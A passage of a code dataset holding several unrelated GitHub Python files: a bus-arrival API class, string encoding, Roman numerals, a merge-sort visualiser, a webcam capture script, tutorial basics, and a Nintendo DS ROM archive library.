GetEstimatedTimeOfArrival(base.ApiBase):\n\n def __init__(self, city: enums.Cities, route_name: str):\n super().__init__(f'/v2/Bus/EstimatedTimeOfArrival/City/{city.value}/{route_name}')\n self.api_filter = (Filter('RouteName/Zh_tw') == route_name).get_value()\n\n self._city = city\n self._route_name = route_name\n","repo_name":"allen0099/BusTracker","sub_path":"api/actions/get_estimated_time_of_arrival.py","file_name":"get_estimated_time_of_arrival.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8366109242","text":"\n\ndef logic(s):\n contains_number = any(letter.isdigit() for letter in s)\n\n if contains_number is True:\n # decode\n temp = list()\n\n s_t = list()\n curnum = ''\n for i in range(len(s)):\n if s[i].isdigit():\n curnum = curnum + s[i]\n print(curnum)\n continue\n else:\n s_t.append(curnum)\n s_t.append(s[i])\n curnum = ''\n # print(s_t)\n i = 0\n while(i < len(s_t)):\n\n if s_t[i].isdigit():\n temp.append(s_t[i+1]*(int(s_t[i])-2))\n i += 2\n continue\n temp.append(s_t[i])\n i += 1\n\n print(''.join(temp))\n\n else:\n # encode\n # cur = None\n # count = 0\n # temp = list()\n # for i in range(len(s)):\n # if cur is not None:\n # if cur == s[i]: # cccc\n # count += 1\n # continue\n # temp.append((cur, count))\n\n # cur = s[i]\n # count = 1\n\n # temp.append((cur, count))\n # print(temp)\n\n # ans = list()\n # for x, y in temp:\n # if y == 1:\n # ans.append(x)\n # continue\n # ans.append(str(y+2))\n # ans.append(x)\n # print(''.join(ans))\n\n # simpler way\n con_flag = False\n temp = list()\n count = 1\n # s = 'chheccck'\n for i in range(0, len(s)-1):\n if s[i] != s[i+1] and con_flag is True:\n temp.append(str(count+2))\n temp.append(s[i])\n con_flag = False\n count = 1\n elif s[i] != s[i+1] and con_flag is False:\n temp.append(str(count+2))\n\n temp.append(s[i])\n # con_flag = False\n count = 1\n elif(s[i] == s[i+1]):\n count += 1\n con_flag = True\n # print(temp)\n # print(count)\n if(not con_flag):\n # single letter at last\n temp.append(s[-1])\n else:\n temp.append(str(count+2))\n temp.append(s[-1])\n print(''.join(temp))\n\n\n# s = '8A5a3x14m'\ns = 'AAAAAAaaaXMMMMMMMMMMMM'\n# s = 'c4he5ck'\n\nlogic(s)\n","repo_name":"rabin245/hackerrank_interview_prep","sub_path":"lf- encode and decode.py","file_name":"lf- encode and decode.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30686333005","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom fpm_universe.pipeline import rolling_validity\n\n\n@pytest.fixture\ndef start_datetime():\n return \"2022-11-01\"\n\n\n@pytest.fixture\ndef last_datetime():\n return \"2022-11-05\"\n\n\n@pytest.fixture\ndef frequency():\n return \"B\"\n\n\n@pytest.fixture\ndef input_values(start_datetime, last_datetime):\n return pd.DataFrame(\n [\n [1, 2, np.nan],\n [np.nan, 5, 6],\n [np.nan, 8, 9],\n [10, 11, np.nan],\n ],\n index=pd.bdate_range(start_datetime, last_datetime, name=\"datetime\"),\n columns=[\"A\", \"AAL\", \"AAPL\"],\n )\n\n\ndef test_rolling_validity(input_values, start_datetime, last_datetime, frequency):\n result = rolling_validity(\n values=input_values,\n threshold_pct=0.5,\n rolling_window=2,\n tolerance_timeframes=0,\n start_datetime=start_datetime,\n last_datetime=last_datetime,\n frequency=frequency,\n )\n expected = pd.DataFrame(\n [\n [True, True, False],\n [True, True, True],\n [False, True, True],\n [True, True, True],\n ],\n index=input_values.index,\n columns=input_values.columns,\n )\n pd.testing.assert_frame_equal(\n expected,\n result,\n )\n","repo_name":"factorpricingmodel/factor-pricing-model-universe","sub_path":"tests/pipeline/test_rolling_validity.py","file_name":"test_rolling_validity.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42661629339","text":"import cv2\nimport os\n\nimport time\nts = time.time()\n\nimport datetime\nst = datetime.datetime.fromtimestamp(ts).strftime('%d-%m-%Y %H:%M:%S')\n\n#creating folders with timestamp\ndef createFolder(directory):\n try:\n\t\t\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n\ncamera = cv2.VideoCapture(0)\ni = 0\nj=1\nfolder='/home/venkatesh/Desktop/IOT Door Security/image capture/captured/'+st\nts = time.time()\n#createFolder(st)\npath=(folder+'/'+st)\nif j==1:\n\tfor i in range (10):\n\t\t# raw_input\n\t\treturn_value, image = camera.read()\n\t\tcreateFolder(folder+'/'+st)\n\t\tcv2.imwrite(path+str(i)+'.png', image)\n\t\ti+=1\n\tdel(camera)\n\n\n\n\n\n","repo_name":"venkatesh1098/FaceRecognitionDoor","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21297452899","text":"import random\nfrom typing import Tuple\n\n\nclass Roman(object):\n\n _symbol = {1: 'I', 5: 'V', 10: 'X', 50: 'L', 100: 'C', 500: 'D', 1000: 'M', 5000: 'V^', 10000: 'X^'}\n _convention = {0: [], 1: [0], 2: [0, 0], 3: [0, 0, 0], 4: [0, 1],\n 5: [1], 6: [1, 0], 7: [1, 0, 0], 8: [1, 0, 0, 0], 9: [0, 2]}\n _basic_romans = {'I': [1, 1], 'II': [1, 2], 'III': [1, 3], 'IV': [1, 4], 'V': [1, 5],\n 'VI': [1, 6], 'VII': [1, 7], 'VIII': [1, 8], 'IX': [1, 9],\n 'X': [10, 1], 'XX': [10, 2], 'XXX': [10, 3], 'XL': [10, 4], 'L': [10, 5],\n 'LX': [10, 6], 'LXX': [10, 7], 'LXXX': [10, 8], 'XC': [10, 9],\n 'C': [100, 1], 'CC': [100, 2], 'CCC': [100, 3], 'CD': [100, 4], 'D': [100, 5],\n 'DC': [100, 6], 'DCC': [100, 7], 'DCCC': [100, 8], 'CM': [100, 9],\n 'M': [1000, 1], 'MM': [1000, 2], 'MMM': [1000, 3], 'MV^': [1000, 4], 'V^': [1000, 5],\n 'V^M': [1000, 6], 'V^MM': [1000, 7], 'V^MMM': [1000, 8], 'MX^': [1000, 9]}\n _cache_decimal = {}\n _cache_roman = {}\n _CASH_LIMIT = 10000000 # prevent memory overflow\n\n @staticmethod\n def _get_symbol(level: int, digit: int) -> str:\n\n tags = ''\n while level > 1000:\n level //= 1000\n tags += '^'\n symbols = [Roman._symbol[level], Roman._symbol[5 * level], Roman._symbol[10 * level]]\n result = ''\n for idx in Roman._convention[digit]:\n result += symbols[idx] + tags\n return result\n\n @staticmethod\n def _get_digit(roman: str) -> Tuple[int, int, str]:\n\n # collect up to 4 symbols and count carets\n buffer = ''\n car_counters = [0, 0, 0, 0]\n remainders = [0, 0, 0, 0]\n rem = 0\n for character in roman:\n if character == '^':\n car_counters[len(buffer) - 1] += 1\n else:\n if len(buffer) > 0:\n remainders[len(buffer) - 1] = rem\n if len(buffer) >= 4:\n break\n buffer += character\n rem += 1\n remainders[len(buffer) - 1] = rem\n for size in range(len(buffer), 0, -1):\n deduct = min(car_counters[0:size])\n factor = 1\n for times in range(deduct):\n factor *= 1000\n symbol = ''\n for char_index in range(size):\n symbol += buffer[char_index] + (car_counters[char_index] - deduct) * '^'\n\n if symbol in Roman._basic_romans:\n level = Roman._basic_romans[symbol][0] * factor\n digit = Roman._basic_romans[symbol][1]\n reminder = roman[remainders[size - 1]:]\n return level, digit, reminder\n\n raise ValueError('Not found')\n\n @staticmethod\n def convert_to_roman(number: int) -> str:\n \"\"\"\n Convert a decimal integer to a Roman numeral string\n\n :param number: a positive integer\n :return: the Roman numeral\n :raises ValueError: if the number is zero or negative\n \"\"\"\n if number < 1:\n raise ValueError(\n 'The ancient Romans did not recognize 0 as a number neither did they include negative numbers')\n if number in Roman._cache_decimal:\n return Roman._cache_decimal[number]\n else:\n result = ''\n level = 1\n for digit in reversed(str(number)):\n result = Roman._get_symbol(level=level, digit=int(digit)) + result\n level *= 10\n\n if len(Roman._cache_decimal) < Roman._CASH_LIMIT:\n Roman._cache_decimal[number] = result\n Roman._cache_roman[result] = number\n\n return result\n\n @staticmethod\n def convert_to_decimal(roman: str) -> int:\n \"\"\"\n Convert a Roman numeral to a decimal\n\n :param roman: a Roman numeral\n :return: the resulting decimal\n :raises ValueError: if the string is not an extended Roman numeral\n \"\"\"\n if not roman:\n return 0\n\n roman = roman.upper()\n if roman in Roman._cache_roman:\n return Roman._cache_roman[roman]\n\n if 'I^' in roman:\n raise ValueError('Not found') # I^ is represented by M\n\n remainder = roman\n number = 0\n prev_level = -1\n while remainder:\n level, digit, remainder = Roman._get_digit(remainder)\n if prev_level < 0:\n prev_level = level\n else:\n if level >= prev_level:\n raise ValueError('Wrong level')\n prev_level = level\n number += digit * level\n\n if len(Roman._cache_decimal) < Roman._CASH_LIMIT:\n Roman._cache_decimal[number] = roman\n Roman._cache_roman[roman] = number\n\n return number\n\n\ndef main() -> int:\n\n do_the_random = False\n if do_the_random:\n for idx in range(1, 1000):\n number = random.randint(1, 9999999)\n print('{} = {}'.format(number, Roman.convert_to_roman(number=number)))\n else:\n test_numbers = [1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 14, 15, 16, 19, 20, 21, 29, 30, 40, 50, 60, 70, 90, 100,\n 110, 111, 119, 120, 140, 149, 150, 199, 200, 300, 400, 500, 600, 700, 900, 999, 1000,\n 1499, 1500, 1501, 1900, 1999, 2222, 2999, 3333, 3999, 4444, 4999, 5555, 5999, 6666,\n 6999, 7777, 7999, 8888, 8999, 9999, 10000, 10001, 10004, 10005, 10006, 10009, 10010,\n 10019, 10022, 10029, 10033, 10039,\n 10044, 10049, 10055, 10059, 10066, 10069, 10077, 10079, 10089, 10099, 10100, 10111, 10199,\n 10222, 10333, 10444, 10555, 10666, 10777, 10888, 10999, 11111, 12222, 13333, 14444, 15555,\n 16666, 17777, 18888, 19999, 20000, 22222, 33333, 44444, 55555, 66666, 77777, 88888, 99999,\n 100000, 111111, 222222, 333333, 444444, 555555, 666666, 777777, 888888, 999999, 1000000,\n 999999999]\n\n test_romans = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VIII', 'IX',\n 'X', 'XI', 'XIV', 'XV', 'XVI', 'XIX',\n 'XX', 'XXI', 'XXIX', 'XXX', 'XL', 'L', 'LX', 'LXX', 'XC',\n 'C', 'CX', 'CXI', 'CXIX', 'CXX', 'CXL', 'CXLIX', 'CL', 'CXCIX', 'CC', 'CCC', 'CD',\n 'D', 'DC', 'DCC', 'CM', 'CMXCIX',\n 'M', 'MCDXCIX', 'MD', 'MDI', 'MCM', 'MCMXCIX', 'MMCCXXII', 'MMCMXCIX', 'MMMCCCXXXIII',\n 'MMMCMXCIX', 'MV^CDXLIV', 'MV^CMXCIX', 'V^DLV', 'V^CMXCIX', 'V^MDCLXVI', 'V^MCMXCIX',\n 'V^MMDCCLXXVII', 'V^MMCMXCIX', 'V^MMMDCCCLXXXVIII', 'V^MMMCMXCIX', 'MX^CMXCIX',\n 'X^', 'X^I', 'X^IV', 'X^V', 'X^VI', 'X^IX', 'X^X', 'X^XIX', 'X^XXII', 'X^XXIX', 'X^XXXIII',\n 'X^XXXIX', 'X^XLIV', 'X^XLIX', 'X^LV', 'X^LIX', 'X^LXVI', 'X^LXIX', 'X^LXXVII', 'X^LXXIX',\n 'X^LXXXIX', 'X^XCIX', 'X^C', 'X^CXI', 'X^CXCIX', 'X^CCXXII', 'X^CCCXXXIII', 'X^CDXLIV',\n 'X^DLV', 'X^DCLXVI', 'X^DCCLXXVII', 'X^DCCCLXXXVIII', 'X^CMXCIX', 'X^MCXI', 'X^MMCCXXII',\n 'X^MMMCCCXXXIII', 'X^MV^CDXLIV', 'X^V^DLV', 'X^V^MDCLXVI', 'X^V^MMDCCLXXVII',\n 'X^V^MMMDCCCLXXXVIII', 'X^MX^CMXCIX',\n 'X^X^', 'X^X^MMCCXXII', 'X^X^X^MMMCCCXXXIII', 'X^L^MV^CDXLIV',\n 'L^V^DLV', 'L^X^V^MDCLXVI', 'L^X^X^V^MMDCCLXXVII', 'L^X^X^X^V^MMMDCCCLXXXVIII',\n 'X^C^MX^CMXCIX',\n 'C^', 'C^X^MCXI', 'C^C^X^X^MMCCXXII', 'C^C^C^X^X^X^MMMCCCXXXIII', 'C^D^X^L^MV^CDXLIV',\n 'D^L^V^DLV', 'D^C^L^X^V^MDCLXVI', 'D^C^C^L^X^X^V^MMDCCLXXVII',\n 'D^C^C^C^L^X^X^X^V^MMMDCCCLXXXVIII', 'C^M^X^C^MX^CMXCIX',\n 'M^', 'C^^M^^X^^C^^M^X^^C^M^X^C^MX^CMXCIX']\n\n for roman_str in test_romans:\n print(Roman.convert_to_decimal(roman_str))\n\n print(Roman.convert_to_decimal('V^MMM'))\n print(Roman.convert_to_decimal('V^MMMDCCLXI'))\n try:\n print(Roman.convert_to_decimal('DCCMM'))\n except ValueError as ex:\n print(str(ex))\n try:\n print(Roman.convert_to_decimal('DCCDC'))\n except ValueError as ex:\n print(str(ex))\n try:\n print(Roman.convert_to_decimal('M^'))\n except ValueError as ex:\n print(str(ex))\n\n for idx in test_numbers:\n print('{} = {}'.format(idx, Roman.convert_to_roman(number=idx)))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"bendaten/roman","sub_path":"roman.py","file_name":"roman.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72358524412","text":"import random\r\nimport pygame\r\nimport time\r\nimport numpy as np\r\n\r\ndef merge_sort(arr, win, h, w):\r\n blue = (65, 105, 225)\r\n while len(arr) != 1:\r\n win.fill((0,0,0))\r\n l = len(arr)\r\n\r\n counter = 0\r\n for i in range(l): # Draw all the rectangles\r\n for j in range(len(arr[i])):\r\n start_pos = ((counter * 10) + 5, h - arr[i][j])\r\n end_pos = (((counter * 10) + 5), h)\r\n counter += 1\r\n pygame.draw.line(win, blue, start_pos, end_pos, w)\r\n \r\n pygame.display.update()\r\n\r\n\r\n counter = 0\r\n for i in range(l):\r\n if len(arr[i]) == len(arr[i+1]):\r\n tempArr = []\r\n\r\n a = b = 0 \r\n\r\n while a < len(arr[i]) and b < len(arr[i]): \r\n if arr[i][a] < arr[i+1][b]:\r\n tempArr.append(arr[i][a])\r\n a += 1\r\n else:\r\n tempArr.append(arr[i+1][b])\r\n b += 1\r\n \r\n while a < len(arr[i]):\r\n tempArr.append(arr[i][a])\r\n a += 1\r\n \r\n while b < len(arr[i+1]):\r\n tempArr.append(arr[i+1][b])\r\n b += 1\r\n\r\n for j in range(len(arr[i])):\r\n pygame.draw.line(win, (255,0,0), (((counter + j)*10) + 5, h - arr[i][j]), (((counter + j)*10)+5, h), w)\r\n play_sound(arr[i][j])\r\n\r\n pygame.draw.line(win, (75, 255, 100), ((((counter + j + len(arr[i+1])))*10)+5, h-arr[i+1][j]), (((counter + j + len(arr[i+1]))*10)+5, h), w) \r\n play_sound(arr[i+1][j])\r\n time.sleep(0.05) \r\n pygame.display.update()\r\n\r\n arr[i] = tempArr\r\n arr.remove(arr[i+1])\r\n break\r\n \r\n for j in range(len(arr[i])): counter +=1 \r\n return arr\r\n\r\ndef play_sound(f):\r\n sampling_rate = 44100\r\n f = f *5\r\n duration = 0.05\r\n frames = int(duration * sampling_rate)\r\n arr = np.sin(2 * np.pi * f * np.linspace(0, duration, frames))\r\n sound = np.asarray([32767 * arr, 32767 * arr]).T.astype(np.int16)\r\n sound = pygame.sndarray.make_sound(sound.copy())\r\n sound.play()\r\n\r\nif __name__ == \"__main__\":\r\n #Initialising pygame\r\n pygame.init()\r\n pygame.mixer.init()\r\n WIDTH, HEIGHT = 640, 512\r\n win = pygame.display.set_mode((WIDTH, HEIGHT))\r\n pygame.display.set_caption(\"Insertion sort\")\r\n\r\n #Initialising attributes for the rectangles\r\n rect_w = 9\r\n num_rect = int(WIDTH / 10)\r\n\r\n # Set parameters\r\n start_value = 1\r\n end_value = HEIGHT\r\n interval = 8\r\n\r\n # Generate a list of numbers with a constant interval\r\n number_list = list(range(start_value, end_value + 1, interval))\r\n random.shuffle(number_list)\r\n rect_h = [[i] for i in number_list]\r\n\r\n running = True\r\n\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n arr = merge_sort(rect_h, win, HEIGHT, rect_w)\r\n win.fill((0,0,0))\r\n for i in range(len(arr[0])+1):\r\n blue = (65, 105, 225)\r\n for j in range(i):\r\n start_pos = ((j * 10) + 5, HEIGHT - arr[0][j])\r\n end_pos = ((j * 10 + 5), HEIGHT)\r\n pygame.draw.line(win, blue, start_pos, end_pos, rect_w)\r\n \r\n pygame.display.update()\r\n \r\n for i in range(len(arr[0])+1):\r\n blue = (65, 105, 225)\r\n for j in range(i):\r\n start_pos = ((j * 10) + 5, HEIGHT - arr[0][j])\r\n end_pos = ((j * 10 + 5), HEIGHT)\r\n pygame.draw.line(win, (75, 255, 100), start_pos, end_pos, rect_w)\r\n play_sound(arr[0][j])\r\n time.sleep(0.05)\r\n pygame.display.update()\r\n \r\n\r\n","repo_name":"shmifful/sorting-algorithms","sub_path":"Merge sort/Merge sort viz.py","file_name":"Merge sort viz.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22987953811","text":"#to use command line arguments\nimport sys\n\nprint (sys.argv)\n\n#to print\nprint(\"This is python basic page\")\n\n#class name starts with an uppercase example Myclass\n#if identifier starts with an underscore it is a private identifier. Example _privateVar\n#if identifier starts with two underscores it is a strong private identifier. Example __strongprivateVar\n#if identifier starts with two underscores and followed by two underscores more, a language-defined special name. Example __privateVar__\n\nif True:\n\tprint(\"Done\")\n\tprint(\"Damage\")\t\nelse:\n\tprint(\"Damage\")\t\n\tprint(\"Undone\")\t\n\nvariable1 = \"This is \"+\\\n\t\"a basic \"+\\\n\t\"Python file.\"\n\nvariable2 = '''This is another statement\nspanning more than two lines\nusing triple quotes'''\n\n# print(variable1)\n\nvariable3 = 5;print(variable3)\n\n#assigning single value to multiple variables\nvar1 = var2 = var3 = 10\n\n# print(var2)\n\n#declaring and assigning multiple variables in the same line\n\nvar4,var5 = 5,6\n\nprint(var5)\n\n#to delete one or more variables\n\n# del var3,var5\n\n# in to check if some value exists in a sequence of characters or a set of numbers, returns true\n\nvar6 = \"This is Chaitanya\"\nvar7 = \"This is chaitanya\"\n\n# if(\"Cha\" in var6):\n# \tprint(var6)\n# else:\n# \tprint(\"Not found\")\t\n\n# if(\"@\" not in var6):\n# \tprint(\"True! Not a mailid\")\n# else:\n# \tprint(\"False! No special characters allowed\")\n\n#id(variable) will generate a random number for that instance.\n\n# print(id(var6))\n# print(id(var7))\n\n#is and is not will check if the values of the variables are same to same.\nif(var6 is not var7):\n\tprint(\"Both variables doesn't have same values\")\t\nelse:\n\tprint(\"Both have same values\")\n\t\n\n\n","repo_name":"cbhallamudi/bcvPython","sub_path":"pythonBasicsRevised.py","file_name":"pythonBasicsRevised.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32356220442","text":"import io\nimport os\nimport re\n\nimport ndspy.rom\nfrom ndspy.fnt import *\n\nfrom formats.binary import *\nfrom .compression import *\n\n\nclass Archive:\n \"\"\"\n Abstract interface representing a file archive.\n \"\"\"\n files: List[bytes] = []\n \"\"\"List of the data contained in the files.\"\"\"\n opened_files: list = []\n \"\"\"List of the currently opened files.\"\"\"\n\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n pass\n\n def add_file(self, file: str) -> Optional[int]:\n \"\"\"\n Adds a file at the specified path.\n\n Parameters\n ----------\n file : str\n The path where the file should be created.\n\n Returns\n -------\n int\n The id of the created file.\n \"\"\"\n pass\n\n def remove_file(self, file: str):\n \"\"\"\n Removes the file at the specified path.\n\n Parameters\n ----------\n file : str\n Path of the file which should be removed.\n \"\"\"\n pass\n\n def rename_file(self, path: str, new_filename: str):\n \"\"\"\n Renames the file at the specified path to the specified file name.\n\n Parameters\n ----------\n path : str\n Path of the file which should be renamed.\n new_filename : str\n New filename for the file.\n \"\"\"\n pass\n\n\nclass RomFile(io.BytesIO):\n \"\"\"\n Wrapper as io.BytesIO for a file in a ROM.\n \"\"\"\n def __init__(self, archive, index: int, operation: str = \"w\"):\n if operation not in [\"r\", \"w\", \"a\"]:\n raise NotImplementedError(f\"operation: {operation}\")\n self.archive = archive\n self.id = index\n self.opp = operation\n if self not in self.archive.opened_files:\n self.archive.opened_files.append(self)\n super().__init__(self.archive.files[index] if operation in [\"r\", \"a\"] else b\"\")\n if operation == \"a\":\n self.read()\n\n def writable(self) -> bool:\n return self.opp in [\"w\", \"a\"]\n\n def close(self):\n self.flush()\n super().close()\n if self in self.archive.opened_files:\n self.archive.opened_files.remove(self)\n\n def fileno(self) -> int:\n return self.id\n\n def flush(self):\n if not self.closed:\n if self.opp != \"r\":\n self.archive.files[self.id] = self.getvalue()\n super().flush()\n\n def __enter__(self):\n super().__enter__()\n return self\n\n def __exit__(self, *args):\n self.close()\n super().__exit__(*args)\n\n def __del__(self):\n self.close()\n\n\nclass CompressedIOWrapper(io.BytesIO):\n \"\"\"\n Wrapper for a compressed file.\n \"\"\"\n def __init__(self, stream, double_typed: Optional[bool] = None):\n \"\"\"\n Parameters\n ----------\n stream : io.BytesIO\n Stream to use for internal data.\n double_typed : bool\n Whether the file has its compression type specified twice.\n \"\"\"\n self._stream = stream\n\n current, self.double_typed = decompress(stream.read(), double_typed)\n\n super().__init__(current)\n\n def close(self):\n self.flush()\n super().close()\n self._stream.close()\n\n def flush(self):\n if self._stream.writable():\n self._stream.truncate(0)\n self._stream.seek(0)\n self._stream.write(compress(self.getvalue(), double_typed=self.double_typed))\n super().flush()\n self._stream.flush()\n\n def __enter__(self):\n super().__enter__()\n return self\n\n\nclass NintendoDSRom(ndspy.rom.NintendoDSRom, Archive):\n \"\"\"\n Archive wrapping around ndspy.rom.NintendoDSRom\n \"\"\"\n opened_files: List[RomFile]\n _loaded_archives: dict\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.lang = \"en\"\n self.is_eu = False\n if self.name == b\"LAYTON2\":\n if self.idCode == b\"YLTE\":\n self.lang = \"en\"\n elif self.idCode == b\"YLTJ\":\n self.lang = \"jp\"\n elif self.idCode.startswith(b\"YLT\"):\n self.is_eu = True\n arm9 = self.loadArm9()\n lang_address = 0x02000d3c - arm9.ramAddress\n lang_id = self.arm9[lang_address]\n lang_table = [\"jp\", \"en\", \"sp\", \"fr\", \"it\", \"ge\", \"du\", \"ko\", \"ch\"]\n try:\n self.lang = lang_table[lang_id]\n except IndexError:\n self.is_eu = False\n self.lang = \"en\"\n\n self._opened_files = []\n \"\"\"List of currently opened files.\"\"\"\n self._loaded_archives: Dict[str, PlzArchive] = {}\n \"\"\"List of currently loaded archives.\"\"\"\n\n self._get_archive_call = False\n\n def get_archive(self, path):\n \"\"\"\n Gets the plz archive from the specified path. An archive should not be opened in any other way.\n\n Parameters\n ----------\n path : str\n Path of the plz archive.\n\n Returns\n -------\n PlzArchive\n The PLZ archive as a PlzArchive object.\n \"\"\"\n if not path[0] == \"/\":\n raise ValueError(\"Path should start with slash.\")\n if path not in self._loaded_archives:\n self._get_archive_call = True\n self._loaded_archives[path] = PlzArchive(path, rom=self)\n self._get_archive_call = False\n return self._loaded_archives[path]\n\n def save(self, *args, **kwargs):\n # Save all archives before saving the ROM.\n self._get_archive_call = True\n for arch in self._loaded_archives:\n self._loaded_archives[arch].save()\n self._get_archive_call = False\n return super(NintendoDSRom, self).save(*args, **kwargs)\n\n # TODO: Unify archive opening and make sure archive are opened only once\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n \"\"\"\n Open the corresponding file in the ROM.\n\n Parameters\n ----------\n file : str | int\n The path or the id of the file.\n mode : str\n The mode for opening the file ('r', 'w', 'a' and the options 'b', '+')\n\n Returns\n -------\n RomFile | io.TextIOWrapper\n The opened rom file.\n \"\"\"\n\n match = re.findall(r\"^([rwa])(b?)(\\+?)$\", mode)\n if not match:\n raise ValueError(f\"invalid mode: '{mode}'\")\n create = False\n text = True\n if match:\n if match[0][1] == \"b\":\n text = False\n if match[0][2] == \"+\":\n create = True\n\n if isinstance(file, int):\n fileid = file\n file = self.filenames.filenameOf(file)\n else:\n fileid = self.filenames.idOf(file)\n if not fileid and create:\n fileid = self.add_file(file)\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened nor created\")\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened\")\n\n if file.lower().endswith(\".plz\") and not self._get_archive_call:\n # Alert on the log of this action.\n logging.warning(\"PLZ archive not opened from get_archive!\", stack_info=True)\n\n rom_file = RomFile(self, fileid, match[0][0])\n if text:\n return io.TextIOWrapper(rom_file, encoding=\"cp1252\")\n return rom_file\n\n def add_file(self, file: str) -> Optional[int]:\n folder_name, filename = os.path.split(file)\n folder_add = self.filenames[folder_name]\n new_file_id = folder_add.firstID + len(folder_add.files)\n\n # Insert our new file into this ID\n self.files.insert(new_file_id, b\"\")\n\n # Add our file to the folder\n folder_add.files.append(filename)\n\n # Change the firstID of all the folders after our base folder.\n def increment_first_index_if_needed(new_id, root: Folder):\n if root.firstID >= new_id and root != folder_add:\n root.firstID += 1\n\n for fd in root.folders:\n increment_first_index_if_needed(new_id, fd[1])\n\n increment_first_index_if_needed(new_file_id, self.filenames)\n\n # increment the id of loaded files after our base id\n for fp in self._opened_files:\n if fp.id > new_file_id:\n fp.id += 1\n\n if fp.id == new_file_id:\n fp.close()\n\n return new_file_id\n\n def remove_file(self, file: str):\n folder_name, filename = os.path.split(file)\n folder: Folder = self.filenames[folder_name]\n fileid = self.filenames.idOf(file)\n folder.files.remove(filename)\n del self.files[fileid]\n\n def decrement_first_index_if_needed(removed_id, root: Folder):\n if root.firstID > removed_id:\n root.firstID -= 1\n\n for fd in root.folders:\n decrement_first_index_if_needed(removed_id, fd[1])\n\n decrement_first_index_if_needed(fileid, self.filenames)\n for fp in self._opened_files:\n if fp.id > fileid:\n fp.id -= 1\n\n if fp.id == fileid:\n fp.close()\n\n def rename_file(self, path: str, new_filename: str):\n folder_name, filename = os.path.split(path)\n folder: Folder = self.filenames[folder_name]\n index = folder.files.index(filename)\n folder.files[index] = new_filename\n\n def move_file(self, old_path, new_path):\n \"\"\"\n Moves the specified file from old_path to new_path.\n\n Parameters\n ----------\n old_path : str\n The old path of the file.\n new_path : str\n The new path of the file.\n \"\"\"\n\n # TODO: What happens with archives?\n\n with self.open(old_path, \"rb\") as f:\n data = f.read()\n self.remove_file(old_path)\n with self.open(new_path, \"wb+\") as f:\n f.write(data)\n\n # TODO: Docstrings for folder methods.\n\n @staticmethod\n def folder_split(path) -> List[str]:\n return [x for x in path.split(\"/\") if x]\n\n def folder_get_parent(self, path) -> Folder:\n *basedirs, subdir = self.folder_split(path)\n if basedirs:\n base_path = \"/\".join(basedirs) + \"/\"\n return self.filenames[base_path]\n else: # The folder is located at the root.\n return self.filenames\n\n def add_folder(self, path):\n parent = self.folder_get_parent(path)\n new_folder = Folder(firstID=len(self.files))\n parent.folders.append((self.folder_split(path)[-1], new_folder))\n\n def remove_folder(self, path):\n folder = self.filenames[path]\n if not folder:\n raise Exception(f\"Directory {path} does not exist.\")\n if folder.files or folder.folders:\n raise Exception(f\"Directory {path} not empty.\")\n\n parent = self.folder_get_parent(path)\n\n parent.folders.remove((self.folder_split(path)[-1], folder))\n\n def rename_folder(self, old_path, new_path):\n folder = self.filenames[old_path]\n\n # get parents\n old_parent = self.folder_get_parent(old_path)\n new_parent = self.folder_get_parent(new_path)\n\n # generate folder items.\n old_folder_item = (self.folder_split(old_path)[-1], folder)\n new_folder_item = (self.folder_split(new_path)[-1], folder)\n\n if old_parent != new_parent:\n old_parent.folders.remove(old_folder_item)\n new_parent.folders.append(new_folder_item)\n else: # same parent, keep the folder index\n index = old_parent.folders.index(old_folder_item)\n new_parent.folders[index] = new_folder_item\n\n\nclass FileFormat:\n \"\"\"\n An abstract class representing a file format on a Nintendo DS rom.\n\n Derived classes implement reading and saving methods for their specific file format.\n \"\"\"\n\n _compressed_default = 0\n \"\"\"\n The compression on this file format.\n \n - 0 - No compression\n - 1 - Compressed file\n - 2 - Double typed compressed file\n \"\"\"\n\n _last_compressed = _compressed_default\n \"\"\"The compression last used when opening the file.\"\"\"\n _last_filename: Optional[str] = None\n \"\"\"The last filename used when opening the file.\"\"\"\n _last_rom: Archive = None\n \"\"\"The last rom used when opening the file.\"\"\"\n\n def __init__(self, filename: str = None, file=None, compressed=None, rom: Archive = None, **kwargs):\n if filename is not None:\n self._last_filename = filename\n self._last_rom = rom\n file = rom.open(filename, \"rb\") if rom else open(filename, \"rb\")\n\n if compressed is None:\n compressed = self._compressed_default\n if compressed:\n file = CompressedIOWrapper(file, double_typed=(compressed == 2))\n self._last_compressed = compressed\n\n if file is not None:\n self.read_stream(file)\n\n for kwarg in kwargs:\n self.__dict__[kwarg] = kwargs[kwarg]\n\n if filename is not None:\n file.close() # we opened the file here, we close the file here\n\n def save(self, filename=None, file=None, compressed=None, rom: Archive = None):\n should_close = False\n if not file:\n should_close = True\n if filename:\n file = rom.open(filename, 